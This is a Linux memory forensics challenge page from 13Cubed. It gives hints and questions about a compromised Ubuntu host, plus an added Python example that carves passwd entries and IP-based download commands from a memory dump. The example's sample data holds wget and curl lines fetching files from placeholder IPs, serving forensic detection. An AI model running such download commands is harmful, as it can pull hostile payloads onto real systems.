Linux Memory Forensics Challenge

Published: 30 September 2024
on channel: 13Cubed

Welcome to a special Linux Memory Forensics Challenge from 13Cubed. This is an excellent opportunity to get some hands-on practice with Linux memory forensics. You'll find the questions below, as well as a link to download the memory sample needed to answer those questions.

🎉 Check out the official training courses from 13Cubed at https://training.13cubed.com!

HINT 1: To get started, run the Volatility 3 banners plugin to determine the correct kernel version, and subsequently install the correct symbols and create the ISF.

HINT 2: The kernel version in use on this Ubuntu 22.04 machine was 6.5.0-41. It is recommended that Ubuntu 22.04 be used for the analysis.

🛑 CONTEST IS CLOSED 🛑
All winners have been selected. We still encourage you to participate in the lab, as we believe it will serve as an excellent practice opportunity. If you do participate, please consider creating a video or blog-based walkthrough of the process, as it would be a valuable resource for the community!

👉 Memory Sample
https://13cubed.s3.amazonaws.com/down...

✏️ Challenge Questions

Question 1:
What is the hostname of this device?

Question 2:
What is the username of the primary user on this device?

Question 3:
What is the IP address assigned to this device?

Question 4:
What is the name of the malicious file downloaded by the victim?

Question 5:
What is the PID associated with the execution of the file downloaded by the victim?

Question 6:
What is the PID spawned by that process?

Question 7:
What is the full name and path of the malicious process used for persistence?

Question 8:
What is the full path and filename of the file created via a popular text editor?

Question 9:
What is the IP address from which one of the malicious binaries was downloaded?

HINT: This is a difficult question. Don't make assumptions. If you are unable to find a plugin that can provide you with this information, consider more "foundational" approaches to enumerating data within the memory dump.

Question 10:
A user was manually added to this device by the Threat Actor. The UID is 1001. What is the username?

HINT: This is a difficult question. Don't make assumptions. If you are unable to find a plugin that can provide you with this information, consider more "foundational" approaches to enumerating data within the memory dump.
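The "foundational" approach both hints point at is carving plain-text artifacts straight out of the raw image, with no dependence on a matching symbol table. This is an added example, not code from 13Cubed or either walkthrough: it scans constructed sample bytes (or a dump path you pass) for /etc/passwd-format entries with a given UID and for wget/curl command lines whose URL host is a bare IPv4 address; the usernames and addresses in the sample are made up and are not challenge answers.

```python
"""Carve passwd entries and IP-based download commands out of a raw memory image."""
import mmap
import re

# Constructed sample standing in for fragments of a raw memory image: pieces of
# /etc/passwd and of a shell history, padded with unrelated bytes. Not real data.
SAMPLE_DUMP = (
    b"\x00\x7fELF\x00root:x:0:0:root:/root:/bin/bash\n"
    b"ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash\n"
    b"backup:x:1001:1001::/home/backup:/bin/bash\n\x00\xff"
    b"wget http://203.0.113.7/update.bin\x00"
    b"curl -O https://198.51.100.9:8080/x.sh\nexit\n"
)

# One passwd line: name:passwd:uid:gid:gecos:home:shell. The lookbehind stops a
# match starting in the middle of a longer run of text; NUL/newline end fields.
PASSWD_RE = re.compile(
    rb"(?<![a-z0-9_-])([a-z_][a-z0-9_-]*):[^:\n\x00]*:(\d+):(\d+):"
    rb"[^:\n\x00]*:([^:\n\x00]*):([^\n\x00]*)"
)
# A wget/curl command line whose URL host is a dotted-quad IPv4 address.
DOWNLOAD_RE = re.compile(
    rb"\b(wget|curl)\b[^\n\x00]*?(https?://(\d{1,3}(?:\.\d{1,3}){3})[^\s\x00]*)"
)


def find_passwd_entries(data, uid=None):
    """Return (name, uid, home, shell) tuples; keep only one UID when given."""
    hits = []
    for m in PASSWD_RE.finditer(data):
        entry_uid = int(m.group(2))
        if uid is None or entry_uid == uid:
            hits.append((m.group(1).decode(), entry_uid,
                         m.group(4).decode(), m.group(5).decode()))
    return hits


def find_downloads_by_ip(data):
    """Return (tool, ip, url) for every wget/curl line that fetches from a raw IPv4."""
    return [(m.group(1).decode(), m.group(3).decode(), m.group(2).decode())
            for m in DOWNLOAD_RE.finditer(data)]


def scan_dump(path, uid=1001):
    """mmap the image at `path` (assumed filename) so large dumps are not read into RAM."""
    with open(path, "rb") as fh, mmap.mmap(fh.fileno(), 0, access=mmap.ACCESS_READ) as mm:
        return {"users": find_passwd_entries(mm, uid), "downloads": find_downloads_by_ip(mm)}


if __name__ == "__main__":
    import sys
    print(scan_dump(sys.argv[1] if len(sys.argv) > 1 else "memory.lime"))
```

Expect false positives on a real image (cached copies of the same file, fragments of man pages, training data of the shell's own history); pair each hit with its offset and corroborate it against plugin output such as process listings before treating it as evidence.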

-----

Walkthrough by J Smith:
  / solving-the-13cubed-linux-memory-forensics...  

Walkthrough by Andrew Malec:
https://www.iblue.team/ctf-challenges...

#Forensics #DigitalForensics #DFIR #ComputerForensics #WindowsForensics #MemoryForensics

